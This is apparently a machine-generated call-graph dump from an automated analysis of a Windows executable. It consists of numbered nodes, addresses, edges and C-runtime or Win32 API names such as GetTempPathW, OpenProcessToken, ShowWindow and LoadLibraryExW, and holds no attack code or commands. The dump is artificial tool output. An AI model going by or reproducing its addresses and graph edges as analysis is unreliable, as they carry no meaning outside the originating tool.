_isindst memcpy_s 18259->18260 18261 7ff73339c741 RtlCaptureContext RtlLookupFunctionEntry 18260->18261 18262 7ff73339c76a RtlVirtualUnwind 18261->18262 18263 7ff73339c7a6 memcpy_s 18261->18263 18262->18263 18264 7ff73339c7d8 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18263->18264 18265 7ff73339c826 _isindst 18264->18265 18265->18077 18267 7ff7333b471c 18266->18267 18268 7ff73339c402 18267->18268 18276 7ff7333ad420 18267->18276 18268->18095 18270 7ff73339ce18 18268->18270 18271 7ff73339ce20 18270->18271 18272 7ff73339ce2a 18270->18272 18288 7ff73339d1b4 18271->18288 18272->18095 18287 7ff7333b1548 EnterCriticalSection 18276->18287 18289 7ff73339ce25 18288->18289 18290 7ff73339d1c3 18288->18290 18292 7ff73339d220 18289->18292 18296 7ff73339d3f0 18290->18296 18293 7ff73339d24b 18292->18293 18294 7ff73339d24f 18293->18294 18295 7ff73339d22e DeleteCriticalSection 18293->18295 18294->18272 18295->18293 18300 7ff73339d258 18296->18300 18306 7ff73339d342 TlsFree 18300->18306 18307 7ff73339d29c __vcrt_FlsAlloc 18300->18307 18301 7ff73339d2ca LoadLibraryExW 18303 7ff73339d369 18301->18303 18304 7ff73339d2eb GetLastError 18301->18304 18302 7ff73339d389 GetProcAddress 18302->18306 18303->18302 18305 7ff73339d380 FreeLibrary 18303->18305 18304->18307 18305->18302 18307->18301 18307->18302 18307->18306 18308 7ff73339d30d LoadLibraryExW 18307->18308 18308->18303 18308->18307 18310 7ff7333b06f0 18309->18310 18312 7ff7333b0796 18310->18312 18314 7ff7333b0743 18310->18314 18311 7ff7333ab758 _invalid_parameter_noinfo 37 API calls 18315 7ff7333b076c 18311->18315 18626 7ff7333b05c8 18312->18626 18314->18311 18315->18109 18634 7ff73339be10 18316->18634 18319 7ff733392ad0 18636 7ff733398840 FindFirstFileExW 18319->18636 18320 7ff733392aab GetLastError 18641 7ff733392310 18320->18641 18324 7ff733392ae3 18658 7ff7333988c0 CreateFileW 18324->18658 18325 7ff733392b3d 18671 7ff733398a00 18325->18671 18326 7ff73339bb10 _log10_special 8 API calls 18329 7ff733392b75 
18326->18329 18329->18154 18338 7ff733391930 18329->18338 18331 7ff733392b4b 18333 7ff733391f30 78 API calls 18331->18333 18336 7ff733392ac6 18331->18336 18332 7ff733392af4 18661 7ff733391f30 18332->18661 18333->18336 18335 7ff733392b0c __vcrt_FlsAlloc 18335->18325 18336->18326 18339 7ff7333939d0 108 API calls 18338->18339 18340 7ff733391965 18339->18340 18341 7ff733391c23 18340->18341 18343 7ff7333973d0 83 API calls 18340->18343 18342 7ff73339bb10 _log10_special 8 API calls 18341->18342 18344 7ff733391c3e 18342->18344 18345 7ff7333919ab 18343->18345 18344->18116 18344->18117 18387 7ff7333919e3 18345->18387 19035 7ff73339fc2c 18345->19035 18347 7ff73339f5a4 74 API calls 18347->18341 18348 7ff7333919c5 18349 7ff7333919e8 18348->18349 18350 7ff7333919c9 18348->18350 19039 7ff73339f8f4 18349->19039 18352 7ff7333a5e48 _get_daylight 11 API calls 18350->18352 18353 7ff7333919ce 18352->18353 19042 7ff733392020 18353->19042 18356 7ff733391a25 18361 7ff733391a5b 18356->18361 18362 7ff733391a3c 18356->18362 18357 7ff733391a06 18358 7ff7333a5e48 _get_daylight 11 API calls 18357->18358 18359 7ff733391a0b 18358->18359 18360 7ff733392020 87 API calls 18359->18360 18360->18387 18363 7ff733391c60 49 API calls 18361->18363 18364 7ff7333a5e48 _get_daylight 11 API calls 18362->18364 18366 7ff733391a72 18363->18366 18365 7ff733391a41 18364->18365 18367 7ff733392020 87 API calls 18365->18367 18368 7ff733391c60 49 API calls 18366->18368 18367->18387 18369 7ff733391abd 18368->18369 18370 7ff73339fc2c 73 API calls 18369->18370 18371 7ff733391ae1 18370->18371 18372 7ff733391b15 18371->18372 18373 7ff733391af6 18371->18373 18374 7ff73339f8f4 _fread_nolock 53 API calls 18372->18374 18375 7ff7333a5e48 _get_daylight 11 API calls 18373->18375 18376 7ff733391b2a 18374->18376 18377 7ff733391afb 18375->18377 18378 7ff733391b4f 18376->18378 18379 7ff733391b30 18376->18379 18380 7ff733392020 87 API calls 18377->18380 19057 7ff73339f668 18378->19057 18381 7ff7333a5e48 _get_daylight 11 API calls 
18379->18381 18380->18387 18383 7ff733391b35 18381->18383 18385 7ff733392020 87 API calls 18383->18385 18385->18387 18386 7ff733391e50 81 API calls 18386->18387 18387->18347 18389 7ff733397e7a 18388->18389 18390 7ff733398950 2 API calls 18389->18390 18391 7ff733397e99 GetEnvironmentVariableW 18390->18391 18392 7ff733397f02 18391->18392 18393 7ff733397eb6 ExpandEnvironmentStringsW 18391->18393 18394 7ff73339bb10 _log10_special 8 API calls 18392->18394 18393->18392 18395 7ff733397ed8 18393->18395 18396 7ff733397f14 18394->18396 18397 7ff733398a00 2 API calls 18395->18397 18396->18126 18398 7ff733397eea 18397->18398 18399 7ff73339bb10 _log10_special 8 API calls 18398->18399 18400 7ff733397efa 18399->18400 18400->18126 18402 7ff733398950 2 API calls 18401->18402 18403 7ff733397f9c 18402->18403 18404 7ff733398950 2 API calls 18403->18404 18405 7ff733397fac 18404->18405 19308 7ff7333a9174 18405->19308 18407 7ff733397fba __vcrt_freefls 18407->18167 18409 7ff7333985d5 18408->18409 19326 7ff733397bb0 GetCurrentProcess OpenProcessToken 18409->19326 18412 7ff733397bb0 7 API calls 18413 7ff733398601 18412->18413 18414 7ff733398634 18413->18414 18415 7ff73339861a 18413->18415 18417 7ff733391d50 48 API calls 18414->18417 18416 7ff733391d50 48 API calls 18415->18416 18418 7ff733398632 18416->18418 18419 7ff733398647 LocalFree LocalFree 18417->18419 18418->18419 18420 7ff733398663 18419->18420 18422 7ff73339866f 18419->18422 19336 7ff733392220 18420->19336 18423 7ff73339bb10 _log10_special 8 API calls 18422->18423 18424 7ff733393099 18423->18424 18424->18176 18425 7ff733397ca0 18424->18425 18426 7ff733397cb8 18425->18426 18427 7ff733397d3a GetTempPathW GetCurrentProcessId 18426->18427 18428 7ff733397cdc 18426->18428 19347 7ff733398760 18427->19347 18430 7ff733397e70 14 API calls 18428->18430 18432 7ff733397ce8 18430->18432 19354 7ff733397610 18432->19354 18459 7ff733398972 MultiByteToWideChar 18458->18459 18462 7ff733398996 18458->18462 18461 7ff7333989ac __vcrt_freefls 
18459->18461 18459->18462 18460 7ff7333989b3 MultiByteToWideChar 18460->18461 18461->18189 18462->18460 18462->18461 18474 7ff73339278e memcpy_s 18463->18474 18464 7ff73339bb10 _log10_special 8 API calls 18465 7ff733392a24 18464->18465 18465->18154 18482 7ff733398590 LocalFree 18465->18482 18466 7ff733392987 18466->18464 18468 7ff733391c60 49 API calls 18468->18474 18469 7ff7333929a2 18471 7ff733391e50 81 API calls 18469->18471 18471->18466 18474->18466 18474->18468 18474->18469 18475 7ff733392989 18474->18475 18477 7ff733392140 81 API calls 18474->18477 18480 7ff733392990 18474->18480 19516 7ff733393970 18474->19516 19522 7ff733397260 18474->19522 19533 7ff7333915e0 18474->19533 19581 7ff733396560 18474->19581 19585 7ff7333935a0 18474->19585 19629 7ff733393860 18474->19629 18476 7ff733391e50 81 API calls 18475->18476 18476->18466 18477->18474 18481 7ff733391e50 81 API calls 18480->18481 18481->18466 18484 7ff733391c85 18483->18484 18485 7ff7333a58c4 49 API calls 18484->18485 18486 7ff733391ca8 18485->18486 18486->18120 18488 7ff733398950 2 API calls 18487->18488 18489 7ff733397ff4 18488->18489 18490 7ff7333a9174 38 API calls 18489->18490 18491 7ff733398006 __vcrt_freefls 18490->18491 18491->18133 18493 7ff7333939dc 18492->18493 18494 7ff733398950 2 API calls 18493->18494 18495 7ff733393a04 18494->18495 18496 7ff733398950 2 API calls 18495->18496 18497 7ff733393a17 18496->18497 19796 7ff7333a6f54 18497->19796 18500 7ff73339bb10 _log10_special 8 API calls 18501 7ff733392ceb 18500->18501 18501->18123 18502 7ff7333973d0 18501->18502 18503 7ff7333973f4 18502->18503 18504 7ff73339fc2c 73 API calls 18503->18504 18509 7ff7333974cb __vcrt_freefls 18503->18509 18505 7ff733397410 18504->18505 18505->18509 20187 7ff7333a8804 18505->20187 18507 7ff73339fc2c 73 API calls 18510 7ff733397425 18507->18510 18508 7ff73339f8f4 _fread_nolock 53 API calls 18508->18510 18509->18127 18510->18507 18510->18508 18510->18509 18512 7ff73339f5d4 18511->18512 20202 7ff73339f380 18512->20202 
18514 7ff73339f5ed 18514->18123 18516 7ff73339be10 18515->18516 18517 7ff733391e74 GetCurrentProcessId 18516->18517 18518 7ff733391c60 49 API calls 18517->18518 18519 7ff733391ec5 18518->18519 18520 7ff7333a58c4 49 API calls 18519->18520 18521 7ff733391f02 18520->18521 18522 7ff733391cc0 80 API calls 18521->18522 18523 7ff733391f0c 18522->18523 18524 7ff73339bb10 _log10_special 8 API calls 18523->18524 18525 7ff733391f1c 18524->18525 18525->18154 18527 7ff733398510 GetConsoleWindow 18526->18527 18528 7ff733393038 18527->18528 18529 7ff73339852a GetCurrentProcessId GetWindowThreadProcessId 18527->18529 18528->18157 18529->18528 18530 7ff733398549 18529->18530 18530->18528 18531 7ff733398551 ShowWindow 18530->18531 18531->18528 18532 7ff733398560 Sleep 18531->18532 18532->18528 18532->18531 18534 7ff733391c60 49 API calls 18533->18534 18535 7ff73339390d 18534->18535 18535->18170 18537 7ff733391c60 49 API calls 18536->18537 18538 7ff733393a70 18537->18538 18538->18186 18540 7ff733396215 18539->18540 18541 7ff7333932b3 18540->18541 18542 7ff7333a5e48 _get_daylight 11 API calls 18540->18542 18545 7ff733396780 18541->18545 18543 7ff733396222 18542->18543 18544 7ff733392020 87 API calls 18543->18544 18544->18541 20213 7ff733391450 18545->20213 20319 7ff7333957a0 18613->20319 18633 7ff7333a62dc EnterCriticalSection 18626->18633 18635 7ff733392a7c GetModuleFileNameW 18634->18635 18635->18319 18635->18320 18637 7ff73339887f FindClose 18636->18637 18638 7ff733398892 18636->18638 18637->18638 18639 7ff73339bb10 _log10_special 8 API calls 18638->18639 18640 7ff733392ada 18639->18640 18640->18324 18640->18325 18642 7ff73339be10 18641->18642 18643 7ff733392330 GetCurrentProcessId 18642->18643 18676 7ff733391d50 18643->18676 18645 7ff73339237b 18680 7ff7333a5b18 18645->18680 18648 7ff733391d50 48 API calls 18649 7ff7333923eb FormatMessageW 18648->18649 18651 7ff733392424 18649->18651 18653 7ff733392436 18649->18653 18652 7ff733391d50 48 API calls 18651->18652 18652->18653 18698 
7ff733391e00 18653->18698 18656 7ff73339bb10 _log10_special 8 API calls 18657 7ff733392464 18656->18657 18657->18336 18659 7ff733398900 GetFinalPathNameByHandleW CloseHandle 18658->18659 18660 7ff733392af0 18658->18660 18659->18660 18660->18332 18660->18335 18662 7ff733391f54 18661->18662 18663 7ff733391d50 48 API calls 18662->18663 18664 7ff733391fa5 18663->18664 18665 7ff7333a5b18 48 API calls 18664->18665 18666 7ff733391fe3 18665->18666 18667 7ff733391e00 78 API calls 18666->18667 18668 7ff733392001 18667->18668 18669 7ff73339bb10 _log10_special 8 API calls 18668->18669 18670 7ff733392011 18669->18670 18670->18336 18672 7ff733398a2a WideCharToMultiByte 18671->18672 18674 7ff733398a55 18671->18674 18672->18674 18675 7ff733398a6b __vcrt_freefls 18672->18675 18673 7ff733398a72 WideCharToMultiByte 18673->18675 18674->18673 18674->18675 18675->18331 18677 7ff733391d75 18676->18677 18678 7ff7333a5b18 48 API calls 18677->18678 18679 7ff733391d98 18678->18679 18679->18645 18682 7ff7333a5b72 18680->18682 18681 7ff7333a5b97 18683 7ff7333ab758 _invalid_parameter_noinfo 37 API calls 18681->18683 18682->18681 18684 7ff7333a5bd3 18682->18684 18686 7ff7333a5bc1 18683->18686 18702 7ff7333a2e08 18684->18702 18688 7ff73339bb10 _log10_special 8 API calls 18686->18688 18687 7ff7333a5cb4 18689 7ff7333ab464 __free_lconv_mon 11 API calls 18687->18689 18690 7ff7333923bb 18688->18690 18689->18686 18690->18648 18692 7ff7333a5c89 18695 7ff7333ab464 __free_lconv_mon 11 API calls 18692->18695 18693 7ff7333a5cda 18693->18687 18694 7ff7333a5ce4 18693->18694 18697 7ff7333ab464 __free_lconv_mon 11 API calls 18694->18697 18695->18686 18696 7ff7333a5c80 18696->18687 18696->18692 18697->18686 18699 7ff733391e26 18698->18699 19020 7ff7333a57a0 18699->19020 18701 7ff733391e3c 18701->18656 18703 7ff7333a2e46 18702->18703 18704 7ff7333a2e36 18702->18704 18705 7ff7333a2e4f 18703->18705 18710 7ff7333a2e7d 18703->18710 18707 7ff7333ab758 _invalid_parameter_noinfo 37 API calls 18704->18707 18708 
7ff7333ab758 _invalid_parameter_noinfo 37 API calls 18705->18708 18706 7ff7333a2e75 18706->18687 18706->18692 18706->18693 18706->18696 18707->18706 18708->18706 18710->18704 18710->18706 18713 7ff7333a4450 18710->18713 18746 7ff7333a35a0 18710->18746 18783 7ff7333a2390 18710->18783 18714 7ff7333a4492 18713->18714 18715 7ff7333a4503 18713->18715 18716 7ff7333a4498 18714->18716 18717 7ff7333a452d 18714->18717 18718 7ff7333a4508 18715->18718 18719 7ff7333a455c 18715->18719 18720 7ff7333a44cc 18716->18720 18721 7ff7333a449d 18716->18721 18806 7ff7333a132c 18717->18806 18722 7ff7333a450a 18718->18722 18723 7ff7333a453d 18718->18723 18725 7ff7333a4573 18719->18725 18727 7ff7333a4566 18719->18727 18731 7ff7333a456b 18719->18731 18728 7ff7333a44a3 18720->18728 18720->18731 18721->18725 18721->18728 18726 7ff7333a44ac 18722->18726 18735 7ff7333a4519 18722->18735 18813 7ff7333a0f1c 18723->18813 18820 7ff7333a5158 18725->18820 18744 7ff7333a459c 18726->18744 18786 7ff7333a4c04 18726->18786 18727->18717 18727->18731 18728->18726 18734 7ff7333a44de 18728->18734 18742 7ff7333a44c7 18728->18742 18731->18744 18824 7ff7333a173c 18731->18824 18734->18744 18796 7ff7333a4f40 18734->18796 18735->18717 18737 7ff7333a451e 18735->18737 18737->18744 18802 7ff7333a5004 18737->18802 18738 7ff73339bb10 _log10_special 8 API calls 18739 7ff7333a4896 18738->18739 18739->18710 18742->18744 18745 7ff7333a4788 18742->18745 18831 7ff7333a5270 18742->18831 18744->18738 18745->18744 18837 7ff7333afad0 18745->18837 18747 7ff7333a35c4 18746->18747 18748 7ff7333a35ae 18746->18748 18751 7ff7333ab758 _invalid_parameter_noinfo 37 API calls 18747->18751 18763 7ff7333a3604 18747->18763 18749 7ff7333a4492 18748->18749 18750 7ff7333a4503 18748->18750 18748->18763 18752 7ff7333a4498 18749->18752 18753 7ff7333a452d 18749->18753 18754 7ff7333a4508 18750->18754 18755 7ff7333a455c 18750->18755 18751->18763 18756 7ff7333a44cc 18752->18756 18757 7ff7333a449d 18752->18757 18760 7ff7333a132c 38 API calls 18753->18760 
18758 7ff7333a450a 18754->18758 18759 7ff7333a453d 18754->18759 18761 7ff7333a4573 18755->18761 18762 7ff7333a4566 18755->18762 18767 7ff7333a456b 18755->18767 18764 7ff7333a44a3 18756->18764 18756->18767 18757->18761 18757->18764 18771 7ff7333a4519 18758->18771 18775 7ff7333a44ac 18758->18775 18765 7ff7333a0f1c 38 API calls 18759->18765 18779 7ff7333a44c7 18760->18779 18768 7ff7333a5158 45 API calls 18761->18768 18762->18753 18762->18767 18763->18710 18769 7ff7333a44de 18764->18769 18764->18775 18764->18779 18765->18779 18766 7ff7333a4c04 47 API calls 18766->18779 18770 7ff7333a173c 38 API calls 18767->18770 18781 7ff7333a459c 18767->18781 18768->18779 18772 7ff7333a4f40 46 API calls 18769->18772 18769->18781 18770->18779 18771->18753 18773 7ff7333a451e 18771->18773 18772->18779 18777 7ff7333a5004 37 API calls 18773->18777 18773->18781 18774 7ff73339bb10 _log10_special 8 API calls 18776 7ff7333a4896 18774->18776 18775->18766 18775->18781 18776->18710 18777->18779 18778 7ff7333a5270 45 API calls 18782 7ff7333a4788 18778->18782 18779->18778 18779->18781 18779->18782 18780 7ff7333afad0 46 API calls 18780->18782 18781->18774 18782->18780 18782->18781 19003 7ff7333a05a0 18783->19003 18787 7ff7333a4c2a 18786->18787 18849 7ff7333a0158 18787->18849 18792 7ff7333a4d6f 18794 7ff7333a5270 45 API calls 18792->18794 18795 7ff7333a4dfd 18792->18795 18793 7ff7333a5270 45 API calls 18793->18792 18794->18795 18795->18742 18799 7ff7333a4f75 18796->18799 18797 7ff7333a4fba 18797->18742 18798 7ff7333a4f93 18801 7ff7333afad0 46 API calls 18798->18801 18799->18797 18799->18798 18800 7ff7333a5270 45 API calls 18799->18800 18800->18798 18801->18797 18805 7ff7333a5025 18802->18805 18803 7ff7333ab758 _invalid_parameter_noinfo 37 API calls 18804 7ff7333a5056 18803->18804 18804->18742 18805->18803 18805->18804 18807 7ff7333a135f 18806->18807 18808 7ff7333a138e 18807->18808 18811 7ff7333a144b 18807->18811 18809 7ff7333a13cb 18808->18809 18976 7ff7333a0200 18808->18976 18809->18742 18812 
7ff7333ab758 _invalid_parameter_noinfo 37 API calls 18811->18812 18812->18809 18814 7ff7333a0f4f 18813->18814 18815 7ff7333a0f7e 18814->18815 18817 7ff7333a103b 18814->18817 18816 7ff7333a0200 12 API calls 18815->18816 18819 7ff7333a0fbb 18815->18819 18816->18819 18818 7ff7333ab758 _invalid_parameter_noinfo 37 API calls 18817->18818 18818->18819 18819->18742 18821 7ff7333a519b 18820->18821 18823 7ff7333a519f __crtLCMapStringW 18821->18823 18984 7ff7333a51f4 18821->18984 18823->18742 18825 7ff7333a176f 18824->18825 18826 7ff7333a179e 18825->18826 18828 7ff7333a185b 18825->18828 18827 7ff7333a0200 12 API calls 18826->18827 18830 7ff7333a17db 18826->18830 18827->18830 18829 7ff7333ab758 _invalid_parameter_noinfo 37 API calls 18828->18829 18829->18830 18830->18742 18832 7ff7333a5287 18831->18832 18988 7ff7333aea80 18832->18988 18839 7ff7333afb01 18837->18839 18846 7ff7333afb0f 18837->18846 18838 7ff7333afb2f 18841 7ff7333afb40 18838->18841 18842 7ff7333afb67 18838->18842 18839->18838 18840 7ff7333a5270 45 API calls 18839->18840 18839->18846 18840->18838 18996 7ff7333b1310 18841->18996 18844 7ff7333afb91 18842->18844 18845 7ff7333afbf2 18842->18845 18842->18846 18844->18846 18848 7ff7333b0b10 _fread_nolock MultiByteToWideChar 18844->18848 18847 7ff7333b0b10 _fread_nolock MultiByteToWideChar 18845->18847 18846->18745 18847->18846 18848->18846 18850 7ff7333a018f 18849->18850 18851 7ff7333a017e 18849->18851 18850->18851 18852 7ff7333ae6c4 _fread_nolock 12 API calls 18850->18852 18857 7ff7333af638 18851->18857 18853 7ff7333a01bc 18852->18853 18854 7ff7333a01d0 18853->18854 18855 7ff7333ab464 __free_lconv_mon 11 API calls 18853->18855 18856 7ff7333ab464 __free_lconv_mon 11 API calls 18854->18856 18855->18854 18856->18851 18858 7ff7333af655 18857->18858 18859 7ff7333af688 18857->18859 18860 7ff7333ab758 _invalid_parameter_noinfo 37 API calls 18858->18860 18859->18858 18861 7ff7333af6ba 18859->18861 18869 7ff7333a4d4d 18860->18869 18866 7ff7333af7cd 18861->18866 18874 
7ff7333af702 18861->18874 18862 7ff7333af8bf 18903 7ff7333aeb24 18862->18903 18864 7ff7333af885 18896 7ff7333aeebc 18864->18896 18866->18862 18866->18864 18867 7ff7333af854 18866->18867 18868 7ff7333af817 18866->18868 18871 7ff7333af80d 18866->18871 18889 7ff7333af19c 18867->18889 18879 7ff7333af3cc 18868->18879 18869->18792 18869->18793 18871->18864 18873 7ff7333af812 18871->18873 18873->18867 18873->18868 18874->18869 18875 7ff7333ab3ac __std_exception_copy 37 API calls 18874->18875 18876 7ff7333af7ba 18875->18876 18876->18869 18877 7ff7333ab844 _isindst 17 API calls 18876->18877 18878 7ff7333af91c 18877->18878 18912 7ff7333b531c 18879->18912 18883 7ff7333af474 18884 7ff7333af4c9 18883->18884 18886 7ff7333af494 18883->18886 18888 7ff7333af478 18883->18888 18965 7ff7333aefb8 18884->18965 18886->18886 18961 7ff7333af274 18886->18961 18888->18869 18890 7ff7333b531c 38 API calls 18889->18890 18891 7ff7333af1e6 18890->18891 18892 7ff7333b4d64 37 API calls 18891->18892 18893 7ff7333af236 18892->18893 18894 7ff7333af23a 18893->18894 18895 7ff7333af274 45 API calls 18893->18895 18894->18869 18895->18894 18897 7ff7333b531c 38 API calls 18896->18897 18898 7ff7333aef07 18897->18898 18899 7ff7333b4d64 37 API calls 18898->18899 18900 7ff7333aef5f 18899->18900 18901 7ff7333aef63 18900->18901 18902 7ff7333aefb8 45 API calls 18900->18902 18901->18869 18902->18901 18904 7ff7333aeb69 18903->18904 18905 7ff7333aeb9c 18903->18905 18906 7ff7333ab758 _invalid_parameter_noinfo 37 API calls 18904->18906 18907 7ff7333aebb4 18905->18907 18909 7ff7333aec35 18905->18909 18911 7ff7333aeb95 memcpy_s 18906->18911 18908 7ff7333aeebc 46 API calls 18907->18908 18908->18911 18910 7ff7333a5270 45 API calls 18909->18910 18909->18911 18910->18911 18911->18869 18913 7ff7333b536f fegetenv 18912->18913 18914 7ff7333b909c 37 API calls 18913->18914 18920 7ff7333b53c2 18914->18920 18915 7ff7333b53ef 18919 7ff7333ab3ac __std_exception_copy 37 API calls 18915->18919 18916 7ff7333b54b2 18917 7ff7333b909c 37 
17748 7ff7333afe04 _get_daylight 11 API calls 17746->17748 17750 7ff7333ac1c5 17747->17750 17751 7ff7333ac16c 17748->17751 17761 7ff7333b3534 17749->17761 17752 7ff7333ac18a FlsSetValue 17751->17752 17753 7ff7333ac17a FlsSetValue 17751->17753 17755 7ff7333ac196 FlsSetValue 17752->17755 17756 7ff7333ac1a8 17752->17756 17754 7ff7333ac183 17753->17754 17757 7ff7333ab464 __free_lconv_mon 11 API calls 17754->17757 17755->17754 17758 7ff7333abdfc _get_daylight 11 API calls 17756->17758 17757->17744 17759 7ff7333ac1b0 17758->17759 17760 7ff7333ab464 __free_lconv_mon 11 API calls 17759->17760 17760->17749 17784 7ff7333b37a4 17761->17784 17763 7ff7333b3569 17799 7ff7333b3234 17763->17799 17766 7ff7333b3586 17766->17697 17767 7ff7333ae6c4 _fread_nolock 12 API calls 17768 7ff7333b3597 17767->17768 17769 7ff7333b359f 17768->17769 17771 7ff7333b35ae 17768->17771 17770 7ff7333ab464 __free_lconv_mon 11 API calls 17769->17770 17770->17766 17771->17771 17806 7ff7333b38dc 17771->17806 17774 7ff7333b36aa 17775 7ff7333a5e48 _get_daylight 11 API calls 17774->17775 17776 7ff7333b36af 17775->17776 17779 7ff7333ab464 __free_lconv_mon 11 API calls 17776->17779 17777 7ff7333b3705 17778 7ff7333b376c 17777->17778 17817 7ff7333b3064 17777->17817 17783 7ff7333ab464 __free_lconv_mon 11 API calls 17778->17783 17779->17766 17780 7ff7333b36c4 17780->17777 17781 7ff7333ab464 __free_lconv_mon 11 API calls 17780->17781 17781->17777 17783->17766 17785 7ff7333b37c7 17784->17785 17786 7ff7333b37d1 17785->17786 17832 7ff7333b1548 EnterCriticalSection 17785->17832 17788 7ff7333b3843 17786->17788 17791 7ff7333ab40c __CxxCallCatchBlock 45 API calls 17786->17791 17788->17763 17792 7ff7333b385b 17791->17792 17794 7ff7333b38b2 17792->17794 17796 7ff7333ac124 50 API calls 17792->17796 17794->17763 17797 7ff7333b389c 17796->17797 17798 7ff7333b3534 65 API calls 17797->17798 17798->17794 17800 7ff7333a5e8c 45 API calls 17799->17800 17801 7ff7333b3248 17800->17801 17802 7ff7333b3266 17801->17802 17803 7ff7333b3254 
GetOEMCP 17801->17803 17804 7ff7333b327b 17802->17804 17805 7ff7333b326b GetACP 17802->17805 17803->17804 17804->17766 17804->17767 17805->17804 17807 7ff7333b3234 47 API calls 17806->17807 17808 7ff7333b3909 17807->17808 17809 7ff7333b3a5f 17808->17809 17811 7ff7333b3946 IsValidCodePage 17808->17811 17816 7ff7333b3960 memcpy_s 17808->17816 17810 7ff73339bb10 _log10_special 8 API calls 17809->17810 17812 7ff7333b36a1 17810->17812 17811->17809 17813 7ff7333b3957 17811->17813 17812->17774 17812->17780 17814 7ff7333b3986 GetCPInfo 17813->17814 17813->17816 17814->17809 17814->17816 17833 7ff7333b334c 17816->17833 17920 7ff7333b1548 EnterCriticalSection 17817->17920 17834 7ff7333b3389 GetCPInfo 17833->17834 17835 7ff7333b347f 17833->17835 17834->17835 17841 7ff7333b339c 17834->17841 17836 7ff73339bb10 _log10_special 8 API calls 17835->17836 17838 7ff7333b351e 17836->17838 17838->17809 17844 7ff7333b40b0 17841->17844 17845 7ff7333a5e8c 45 API calls 17844->17845 17846 7ff7333b40f2 17845->17846 17864 7ff7333b0b10 17846->17864 17866 7ff7333b0b19 MultiByteToWideChar 17864->17866 17922 7ff7333aa285 17921->17922 17923 7ff7333aa3e9 17921->17923 17922->17736 17924 7ff7333aa412 17923->17924 17925 7ff7333ab464 __free_lconv_mon 11 API calls 17923->17925 17926 7ff7333ab464 __free_lconv_mon 11 API calls 17924->17926 17925->17923 17926->17922 17928 7ff7333b7531 17927->17928 17929 7ff7333b7548 17927->17929 17930 7ff7333a5e48 _get_daylight 11 API calls 17928->17930 17929->17928 17931 7ff7333b7556 17929->17931 17932 7ff7333b7536 17930->17932 17934 7ff7333a5e8c 45 API calls 17931->17934 17935 7ff7333b7541 17931->17935 17933 7ff7333ab824 _invalid_parameter_noinfo 37 API calls 17932->17933 17933->17935 17934->17935 17935->17573 17937 7ff7333a5e8c 45 API calls 17936->17937 17938 7ff7333ba1e1 17937->17938 17941 7ff7333b9e38 17938->17941 17944 7ff7333b9e86 17941->17944 17942 7ff73339bb10 _log10_special 8 API calls 17943 7ff7333b8475 17942->17943 17943->17573 17943->17599 17945 7ff7333b9f0d 
17944->17945 17947 7ff7333b9ef8 GetCPInfo 17944->17947 17950 7ff7333b9f11 17944->17950 17946 7ff7333b0b10 _fread_nolock MultiByteToWideChar 17945->17946 17945->17950 17948 7ff7333b9fa5 17946->17948 17947->17945 17947->17950 17949 7ff7333ae6c4 _fread_nolock 12 API calls 17948->17949 17948->17950 17951 7ff7333b9fdc 17948->17951 17949->17951 17950->17942 17951->17950 17952 7ff7333b0b10 _fread_nolock MultiByteToWideChar 17951->17952 17953 7ff7333ba04a 17952->17953 17954 7ff7333ba12c 17953->17954 17955 7ff7333b0b10 _fread_nolock MultiByteToWideChar 17953->17955 17954->17950 17956 7ff7333ab464 __free_lconv_mon 11 API calls 17954->17956 17957 7ff7333ba070 17955->17957 17956->17950 17957->17954 17958 7ff7333ae6c4 _fread_nolock 12 API calls 17957->17958 17959 7ff7333ba09d 17957->17959 17958->17959 17959->17954 17960 7ff7333b0b10 _fread_nolock MultiByteToWideChar 17959->17960 17961 7ff7333ba114 17960->17961 17962 7ff7333ba134 17961->17962 17963 7ff7333ba11a 17961->17963 17970 7ff7333b01d4 17962->17970 17963->17954 17966 7ff7333ab464 __free_lconv_mon 11 API calls 17963->17966 17966->17954 17967 7ff7333ba173 17967->17950 17969 7ff7333ab464 __free_lconv_mon 11 API calls 17967->17969 17968 7ff7333ab464 __free_lconv_mon 11 API calls 17968->17967 17969->17950 17971 7ff7333aff7c __crtLCMapStringW 5 API calls 17970->17971 17972 7ff7333b0212 17971->17972 17973 7ff7333b021a 17972->17973 17974 7ff7333b043c __crtLCMapStringW 5 API calls 17972->17974 17973->17967 17973->17968 17975 7ff7333b0283 CompareStringW 17974->17975 17975->17973 17977 7ff7333b8eb1 17976->17977 17978 7ff7333b8eca HeapSize 17976->17978 17979 7ff7333a5e48 _get_daylight 11 API calls 17977->17979 17980 7ff7333b8eb6 17979->17980 17981 7ff7333ab824 _invalid_parameter_noinfo 37 API calls 17980->17981 17982 7ff7333b8ec1 17981->17982 17982->17603 17984 7ff7333b8f03 17983->17984 17985 7ff7333b8ef9 17983->17985 17987 7ff7333b8f08 17984->17987 17993 7ff7333b8f0f _get_daylight 17984->17993 17986 7ff7333ae6c4 _fread_nolock 12 API 
calls 17985->17986 17991 7ff7333b8f01 17986->17991 17988 7ff7333ab464 __free_lconv_mon 11 API calls 17987->17988 17988->17991 17989 7ff7333b8f42 HeapReAlloc 17989->17991 17989->17993 17990 7ff7333b8f15 17992 7ff7333a5e48 _get_daylight 11 API calls 17990->17992 17991->17608 17992->17991 17993->17989 17993->17990 17994 7ff7333b4800 _get_daylight 2 API calls 17993->17994 17994->17993 17996 7ff7333aff7c __crtLCMapStringW 5 API calls 17995->17996 17997 7ff7333b01b0 17996->17997 17997->17613 17999 7ff7333a6492 17998->17999 18000 7ff7333a64b6 17998->18000 18004 7ff7333ab464 __free_lconv_mon 11 API calls 17999->18004 18006 7ff7333a64a1 17999->18006 18001 7ff7333a6510 18000->18001 18002 7ff7333a64bb 18000->18002 18003 7ff7333b0b10 _fread_nolock MultiByteToWideChar 18001->18003 18005 7ff7333a64d0 18002->18005 18002->18006 18007 7ff7333ab464 __free_lconv_mon 11 API calls 18002->18007 18014 7ff7333a652c 18003->18014 18004->18006 18008 7ff7333ae6c4 _fread_nolock 12 API calls 18005->18008 18006->17616 18006->17617 18007->18005 18008->18006 18009 7ff7333a6533 GetLastError 18010 7ff7333a5dbc _fread_nolock 11 API calls 18009->18010 18012 7ff7333a6540 18010->18012 18011 7ff7333a656e 18011->18006 18015 7ff7333b0b10 _fread_nolock MultiByteToWideChar 18011->18015 18016 7ff7333a5e48 _get_daylight 11 API calls 18012->18016 18013 7ff7333a6561 18018 7ff7333ae6c4 _fread_nolock 12 API calls 18013->18018 18014->18009 18014->18011 18014->18013 18017 7ff7333ab464 __free_lconv_mon 11 API calls 18014->18017 18019 7ff7333a65b2 18015->18019 18016->18006 18017->18013 18018->18011 18019->18006 